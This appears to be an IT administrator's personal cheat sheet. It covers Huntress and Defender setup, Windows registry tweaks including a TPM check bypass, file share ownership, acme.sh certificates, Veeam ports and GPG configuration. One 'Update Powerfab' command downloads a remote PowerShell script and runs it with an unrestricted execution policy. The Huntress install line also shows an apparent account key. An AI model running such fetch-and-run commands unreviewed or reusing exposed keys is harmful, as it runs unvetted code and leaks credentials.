Firmware Upgrade - Keystone Support

Metamask Integration

MetaMask - Keystone Support

Hidden Passphrase Wallet

Passphrase - Keystone Support

Huntress

Huntress managed security platform + agent for managing defender and ransomware canaries

https://support.huntress.io/hc/en-us/articles/4404004936339-Install-via-PowerShell 

Run This to install via PS

PS Command

powershell -executionpolicy bypass -f ./InstallHuntress.powershellv2.ps1 -acctkey 8aae0ac4a32d886a8a450ab639b80213 -orgkey reso -tags RESO-DT-CK -reregister -reinstall

Script Location

https://github.com/huntresslabs/deployment-scripts/blob/main/Powershell/InstallHuntress.powershellv2.ps1 

Enable Defender via Powershell

Set-MpPreference -DisableRealtimeMonitoring $false

Set-MpPreference -DisableIOAVProtection $false

New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "Real-Time Protection" -Force

New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableBehaviorMonitoring" -Value 0 -PropertyType DWORD -Force

New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableOnAccessProtection" -Value 0 -PropertyType DWORD -Force

New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableScanOnRealtimeEnable" -Value 0 -PropertyType DWORD -Force

New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 0 -PropertyType DWORD -Force

start-service WinDefend

start-service WdNisSvc

https://support.huntress.io/hc/en-us/articles/4402989131283-Enabling-Microsoft-Defender-using-Powershell- 

Firewall Exceptions

Requires outbound traffic on 443 to communicate with:

  • *.huntress.io
  • *.huntresscdn.com
  • huntress-installers.s3.amazonaws.com
  • huntress-updates.s3.amazonaws.com
  • huntress-uploads.s3.us-west-2.amazonaws.com
  • huntress-user-uploads.s3.amazonaws.com
  • huntress-rio.s3.amazonaws.com
  • huntress-survey-results.s3.amazonaws.com
  • huntress-*.s3.amazonaws.com
  • notify.bugsnag.com (this is for our bug reporting software if an Agent has an issue communicating) (you may see it point to something like 6.205.186.35.bc.googleusercontent.com)
  • update.huntress.io
  • huntress.io
  • eetee.huntress.io
  • eetee.huntresscdn.com
  • Huntresscdn.com

It's quite rare but occasionally you might run into issues where Huntress is "taking" ownership of a listening port which might interfere with another program (usually a hosting/dev app like Visual Studio/IIS/etc). These high-numbered ports are randomized, temporary, and uncontrollable.

Powershell command

Get-NetTcpConnection | Select Local*,Remote*,State,@{Name="Process";Expression={(Get-Process -Id $_.OwningProcess).ProcessName}} | Where-Object{$_.Process -eq "HuntressAgent"}

macOS

sudo lsof -i -P | grep "Huntress"

Phonetic Alphabet

A Alpha

B Bravo

C Charlie

D Delta

E Echo

F Foxtrot

G Golf

H Hotel

I India

J Juliet

K Kilo

L Lima

M Mike

N November

O Oscar

P Papa

Q Quebec

R Romeo

S Sierra

T Tango

U Uniform

V Victor

W Whiskey

X X-ray

Y Yankee

Z Zulu

Nginx

 Config Changes

sudo docker exec nginx-nginx-1 nginx -t

sudo docker exec nginx-nginx-1 nginx -s reload

Windows 11 Req Bypass

Computer\HKEY_LOCAL_MACHINE\SYSTEM\Setup

Create new key called “LabConfig”  

New 32 bit dword

BypassTPMCheck  set “1”

BypassSecureBootCheck  set to “1”

Computer\HKEY_LOCAL_MACHINE\SYSTEM\Setup\MoSetup

New dword 32 Bit

AllowUpgradesWithUnsupportedTPMOrCPU  set to “1”

https://github.com/AveYo/MediaCreationTool.bat/blob/main/bypass11/Skip_TPM_Check_on_Dynamic_Update.cmd 

Mozilla Firefox Wrong Language Fix

winget install --id Mozilla.Firefox --exact --locale en-US --force --scope machine --source winget --silent --accept-package-agreements --accept-source-agreements --disable-interactivity

 

https://www.reddit.com/r/firefox/comments/1ap1td5/firefox_switching_to_czech/ 

macOS Time Fix

sudo sntp -sS pool.ntp.org

Max ShadowCopies

https://learn.microsoft.com/en-us/windows/win32/backup/registry-keys-for-backup-and-restore?redirectedfrom=MSDN#maxshadowcopies 

Take Ownership of Folder in File Share

takeown /f "\\IRON-FILE1\Maint\Shop Maintenance\shipping over head doors" /r /d Y

icacls "\\IRON-FILE1\Maint\Shop Maintenance\shipping over head doors" /grant Administrators:F /t

Powershell IF CMD Prompt Fails

takeown /f "\\IRON-FILE1\Maint\Shop Maintenance\shipping over head doors" /r /d Y

icacls "\\IRON-FILE1\Maint\Shop Maintenance\shipping over head doors" /grant Administrators:F /t

Disable NVIDIA Ansel

dir "$env:systemroot\system32\driverstore\filerepository\*NvCameraEnable.exe" -rec |% {& "$_" off}

dir "$env:programfiles\nvidia corporation\*NvCameraEnable.exe" -rec |% {& "$_" off}  

Disable Network from File Explorer

Key Location:

HKEY_CLASSES_ROOT\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder

Backup the shellfolder → export

Right click and choose permissions

Make sure user/system has Full control

Change the Attributes value from "b0040064" to "b0940064"

Restart computer

The network explorer option with network devices should now be hidden. To undo this change simply set it back to the original value and reboot!

https://www.youtube.com/watch?v=jQ83RU6SFm4 

Veeam Backup and Replication

NFS Share Path Format for Backup Repository

10.3.3.10:/VEEAM

Verify Domain Trust

Verify Domain

nltest /sc_verify:domainname

 

verify with Domain controller

netdom verify Computername

 

Verify PSO has been applied

Fine-Grained Password Policies (FGPP)

If your goal is to have different password policies for specific users or groups (like your Back Office group), it's recommended to use Fine-Grained Password Policies, which are managed through Active Directory Administrative Center or PowerShell.

FGPP allows you to set password policies based on security groups, rather than applying GPOs to OUs, which won't work for password policy changes.

Get-ADFineGrainedPasswordPolicy -Filter * | Where-Object {$_.appliesto -like '*BackOfficeUsers_PolicyGroup*'}

Update Powerfab

powershell.exe -EP Unrestricted -Command "iwr 'https://raw.githubusercontent.com/christopherkelley89/TeklaUpdate/refs/heads/main/powerfabGO.ps1' -OutFile powerfab.ps1; .\powerfab.ps1"

ACME.SH

Azure stuff: https://github.com/acmesh-official/acme.sh/wiki/How-to-use-Azure-DNS 

Set Issuer

acme.sh --issue --dns dns_azure -d resolvetech.biz -d '*.resolvetech.biz' --force --staging --debug

Issue Certificate Command

acme.sh --issue --dns dns_azure -d "*.resolvetech.biz" --force

LE Issuance via CF

Staging

  • Run this first, you can test in staging as long as you want and make sure DNS Challenge is tight. IN PRODUCTION ITS RATE LIMITED. I.e. you’ll be unable to renew your cert for 18hrs. Test in staging and switch back.

Set to Staging to test

acme.sh --set-default-ca --server https://acme-staging-v02.api.letsencrypt.org/directory

acme.sh --issue --server https://acme-staging-v02.api.letsencrypt.org/directory --dns dns_cf -d cktech.org -d *.cktech.org --keylength ec-256

acme.sh --issue --server https://acme-staging-v02.api.letsencrypt.org/directory --dns dns_cf -d cktechlab.com -d *.cktechlab.com --keylength ec-256

Production Issuance

set back to prod

acme.sh --set-default-ca --server https://acme-v02.api.letsencrypt.org/directory

acme.sh --issue --dns dns_cf -d cktechlab.com -d *.cktechlab.com --keylength ec-256 --force

verify issuance

ls ~/.acme.sh/cktechlab.com_ecc/

 Install the Certificate

acme.sh --install-cert -d cktechlab.com \
  --cert-file /etc/nginx/certs/cktechlab.com/cert.pem \
  --key-file /etc/nginx/certs/cktechlab.com/privkey.pem \
  --fullchain-file /etc/nginx/certs/cktechlab.com/fullchain.pem \
  --reloadcmd "nginx -s reload"

acme.sh --list

Set Renewal Cron Job

acme.sh --install-cronjob


Disable ipv6 On Windows 10/11 workstations


Get current settings
Get-NetAdapterBinding -ComponentID ms_tcpip6

Disable
Disable-NetAdapterBinding -Name "Ethernet" -ComponentID ms_tcpip6

Re-enable
Enable-NetAdapterBinding -Name "Ethernet" -ComponentID ms_tcpip6

Veeam

Veeam Ports used for Backup Infrastructure components

TCP port 10001-1030

TCP/UDP port 135

TCP port 443

Ports 137-13

TCP port 6160

TCP port 9392

Port 5432

Port 1433

https://helpcenter.veeam.com/docs/backup/vsphere/used_ports.html?ver=12



KDE Wayland monitor fix

Lives here:

~/.config/plasma-workspace/env/rog-monitor-fix.sh

#!/bin/bash

# Wait a moment after login (Wayland delay fix)

sleep 2

# Assign outputs by refresh rate (because DP IDs can change)

output360=$(kscreen-doctor --json | jq -r '.outputs[] | select(.connected == true and .modes[]?.name == "2560x1440@360") | .id')

output240=$(kscreen-doctor --json | jq -r '.outputs[] | select(.connected == true and .modes[]?.name == "2560x1440@240") | .id')

output60=$(kscreen-doctor --json | jq -r '.outputs[] | select(.connected == true and .modes[]?.name == "2560x1440@60") | .id')

# Apply layout

kscreen-doctor output.${output360}.mode.2560x1440@360 output.${output360}.position.0,0 output.${output360}.primary

kscreen-doctor output.${output240}.mode.2560x1440@240 output.${output240}.position.2560,0

kscreen-doctor output.${output60}.mode.2560x1440@60 output.${output60}.position.5120,0

# Optional: Disable extra weird output if needed

# kscreen-doctor output.DP-5.disable

Git Commands

cd ~/arch

# Stage the new cheatsheet

git add git-cheatsheet.md

# Commit with a clear message

git commit -m "Add git-cheatsheet.md with beginner Git usage tips"

# Push to the remote main branch

git push origin main

Dotfile Changes

Copy to Directory

cp ~/.bashrc ~/arch/dotfiles/

cp ~/.zshrc ~/arch/dotfiles/

Push to Git

cd ~/arch/dotfiles

git add .

git commit -m "Update .zshrc and .bashrc with latest changes"

git push


Get-DiskImage -ImagePath "D:\Hyper-V\IRON-FILE1\iron-file1-e.vhdx"

handle "iron-file1-e.vhdx"

Dismount-DiskImage -ImagePath "D:\Hyper-V\IRON-FILE1\iron-file1-e.vhdx"

C:\HyperV\CKEL-WIN11-2\Virtual Hard Disks\CKEL-WIN11-2.vhdx

Mount-DiskImage -ImagePath "C:\HyperV\CKEL-WIN11-2\Virtual Hard Disks\CKEL-WIN11-2.vhdx"

GPG Key

Installation

Install GnuPG and pinentry

sudo pacman -S gnupg pinentry-qt

Set correct permissions for GPG directory

mkdir -p ~/.gnupg

chmod 700 ~/.gnupg

Set default gpg-agent options for passphrase caching and pinentry

cat > ~/.gnupg/gpg-agent.conf <<EOF
default-cache-ttl 600
max-cache-ttl 7200
enable-ssh-support
pinentry-program /usr/bin/pinentry-qt
EOF

gpgconf --kill gpg-agent

gpgconf --launch gpg-agent

gpgconf --list-dirs agent-socket

# Generate a new GPG key

gpg --full-generate-key

List keys to verify creation

gpg --list-keys

Enable GPG agent in environment in ZSH example

echo 'export GPG_TTY=$(tty)' >> ~/.zshrc

echo 'gpgconf --launch gpg-agent' >> ~/.zshrc

source ~/.zshrc

Test GPG signing

echo "test" | gpg --clearsign

# Configure Git to use GPG key (replace YOURKEYID)

git config --global user.signingkey YOURKEYID

git config --global commit.gpgsign true

DNS-Queries

dig example.com

# Get short answer (just IPs)

dig +short example.com

# Query a specific nameserver

dig @1.1.1.1 example.com

# Query DNS-over-TLS endpoint (if setup locally with stubby/unbound)

dig +tls example.com

# Check MX records

dig example.com MX

# Check TXT records

dig example.com TXT

# DNSSEC validation check

dig +dnssec example.com

# Check NS delegation

dig example.com NS

# Reverse lookup IP to domain

dig -x 1.2.3.4

# Trace full DNS resolution path

dig +trace example.com

# Full TCP query (good for firewall testing)

dig +tcp example.com

# Query root servers directly

dig . NS